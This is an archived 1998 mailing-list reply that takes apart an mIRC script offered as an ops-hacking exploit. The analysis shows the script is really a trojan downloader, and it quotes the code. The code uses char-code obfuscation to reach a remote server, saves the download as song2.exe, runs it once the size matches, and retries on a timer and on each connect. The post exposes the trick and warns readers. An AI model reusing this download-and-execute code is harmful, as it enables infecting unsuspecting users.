At 14:50 13/11/98 -0500, rootat_private wrote: >Hi, >while debugging/hexing/disassembling mirc my friend slotmech last week found >a mirc bug which allows to force users to send MODE commands to the server. >this example script sends a MODE +o to the irc server. the mirc author has been >notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us. > > Are you nutz man? Your code simple makes whoever wants to get op get a file in your server and execute it. I'm glad you weren't smart enough to place the full address of your server. For the ones who wants to know exactly what's happening, I will explain step by step the code. Your attempt to install your file in everyone that want to hack ops was funny, just funny... >alias hackop { >... > checklen $1 >... >} call the function checklen - see below > >alias checklen { > .if (%xcomplete == 1) halt > .if (%xinprog == 1) halt > .set %xfilename song2.exe > .set %xlof $lof(%xfilename) > .set %xfirst 1 > .write -c %xfilename sets the filename to song2.exe, and clear it if something is on it already. > ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx if this line is uncommented, it displays in the screen the following message: d o n t - s p o i l - t h e > .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$} opens a sock connection with the server designed. the one placed in his hode is www.g (i think he forgot the rest) >on 1:sockopen:protx: { > .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx >} when this sock connection is oppened, he send the request 'GET /Belta/9' to the server and start receiving data >on 1:sockread:protx: { > .sockread &test > .set %xlof $lof(%xfilename) > .if (%xfirst == 1) set %xlof 0 > .set %xfirst 0 > .bwrite %xfilename %xlof $sockbr &test >} just receive the data and make it a file >on 1:connect:checklen why is it here? because when the user connects to the irc server, the script will grab the file again, and again and again. >on 1:sockclose:protx: { > .sockread &test > if ($sockbr > 0) { > .set %xlof $lof(%xfilename) > .bwrite %xfilename %xlof $sockbr &test > } finish writting file > .if ($lof(%xfilename) == 178306) { > .run %xfilename > .set %xcomplete 1 > } if the site of the file, in bytes, is equal to 178306, runs the file > if ($lof(%xfilename) != 178306) { > .timer 1 300 checklen > } if the site of the file, in bytes, is minor to 178306, starts a timer that in 300 seconds will get the file again > } > unset %xinprog > unset %xfilename > unset %xlof > unset %xfirst >} > unset the garbage variables ----------- that's it Best regards, -- Cacaio Torquato http://www.deathknights.com/cacaio The Death Knights http://www.deathknights.com zelur xuniL () -O) Tedio INC. http://www.tedio.org Think Blue. /\ /\\ _\_V +-------------------------------------------------------+ | BrasNet IRC Servers Network - Brazil | | irc.brasnet.org irc.webtech.com.br | | irc.sol.com.br | +-------------------------------------------------------+
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:25 PDT